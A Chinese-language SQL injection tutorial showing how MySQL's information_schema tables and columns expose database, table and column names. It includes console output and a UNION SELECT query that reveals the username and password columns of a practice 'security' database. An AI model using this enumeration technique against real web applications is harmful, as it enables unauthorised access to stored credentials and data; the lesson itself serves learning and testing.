SQL注入之information_schema

 

 

在学习SQL注入时, 经常拿出来的例子就是PHP+MySQL这一套经典组合. 其中又经常提到的>=5.0版本的MySQL的内置库: information_schema

 

简单看一下information_schema库中的内容

其中在注入时关注的两张表: tables 和 columns

mysql> use information_schema Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema          | +---------------------------------------+ | CHARACTER_SETS                        | | COLLATIONS                            | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS                               | | COLUMN_PRIVILEGES                     | | ENGINES                               | | EVENTS                                | | FILES                                 | | GLOBAL_STATUS                         | | GLOBAL_VARIABLES                      | | KEY_COLUMN_USAGE                      | | PARAMETERS                            | | PARTITIONS                            | | PLUGINS                               | | PROCESSLIST                           | | PROFILING                             | | REFERENTIAL_CONSTRAINTS               | | ROUTINES                              | | SCHEMATA                              | | SCHEMA_PRIVILEGES                     | | SESSION_STATUS                        | | SESSION_VARIABLES                     | | STATISTICS                            | | TABLES                                | | TABLESPACES                           | | TABLE_CONSTRAINTS                     | | TABLE_PRIVILEGES                      | | TRIGGERS                              | | USER_PRIVILEGES                       | | VIEWS                                 | | INNODB_BUFFER_PAGE                    | | INNODB_TRX                            | | INNODB_BUFFER_POOL_STATS              | | INNODB_LOCK_WAITS                     | | INNODB_CMPMEM                         | | INNODB_CMP                            | | INNODB_LOCKS                          | | INNODB_CMPMEM_RESET                   | | INNODB_CMP_RESET                      | | INNODB_BUFFER_PAGE_LRU                | +---------------------------------------+ 40 rows in set (0.00 sec)

其中tables表中保存的是库和表名的对应信息, 分别是table_schema, table_name.

 

通过select table_schema, table_name from tables, 可以查询整个MySQL下所有的库名和表名的对应信息. 注意是全部的, 查询指定库的话, 使用where条件指定即可

 

mysql> select table_schema, table_name from tables where table_schema='security'; +--------------+------------+ | table_schema | table_name | +--------------+------------+ | security     | emails     | | security     | referers   | | security     | uagents    | | security     | users      | +--------------+------------+ 4 rows in set (0.00 sec)　

 

另一张表columns, 里面是有三个字段的, table_schema, table_name, column_name

mysql> select table_schema, table_name, column_name from columns where table_schema='security' and table_name='users'; +--------------+------------+-------------+ | table_schema | table_name | column_name | +--------------+------------+-------------+ | security     | users      | id          | | security     | users      | username    | | security     | users      | password    | +--------------+------------+-------------+ 3 rows in set (0.01 sec) 

 

 

带入到联合查询中的写法

 

mysql> select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users'; +----------+----------+----------+ | id       | username | password | +----------+----------+----------+ | 1        | Dumb     | Dumb     | | security | users    | id       | | security | users    | username | | security | users    | password | +----------+----------+----------+ 4 rows in set (0.00 sec)